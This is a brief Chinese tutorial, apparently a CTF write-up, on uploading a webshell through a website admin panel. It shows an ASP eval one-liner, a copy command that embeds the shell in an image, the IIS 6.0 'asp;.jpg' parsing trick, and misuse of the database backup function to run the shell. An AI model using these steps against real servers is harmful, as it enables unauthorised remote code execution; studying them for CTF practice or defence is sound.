简单的后台挂马

一般来说 给一个网站 都是先找出它的后台登录界面  过登录界面的方法很多  很多人都发过了 像sql注入 弱口令等 所以我们直接快进到网站后台登录界面 尝试挂马

1.找到文件上传的地方 

差不多 网站都会做黑白名单的过滤 所以想要直接访问.asp .php .asa等之类的木马文件基本上行不通   所以我们换思路 拿这题做例子

通过burp发送响应包 我们发现中间件的版本 是iis6.0 我们首先想到解析漏洞

2.尝试利用解析漏洞上传木马文件

先利用cmd做一个简单的木马  copy  copy 1.jpg/b+1.asp/a  2.jpg          php同样适用

<%eval request("a")%>

将后缀名改为 3.asp;.jpg        顺便补充一点

后缀名为 .asa .cer .cdx 的文件都能被当做脚本执行

3.提交之后发现文件名依旧没变   但是我们知道了路径

4.接着我们在翻看网站时发现一个数据库备份的地方 我们就可以利用了

5.接着发现了数据库的备份目录

6.我们访问发现 有两个asa后缀名 访问失败

7.尝试去掉一个后缀名  

8.出现乱码就说明 木马被当做脚本执行了  然后我们连接 蚁剑 (菜刀也可以)

成功访问后台   做题的时候 经常发现 数据库备份和文件上传配合 获取webshell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值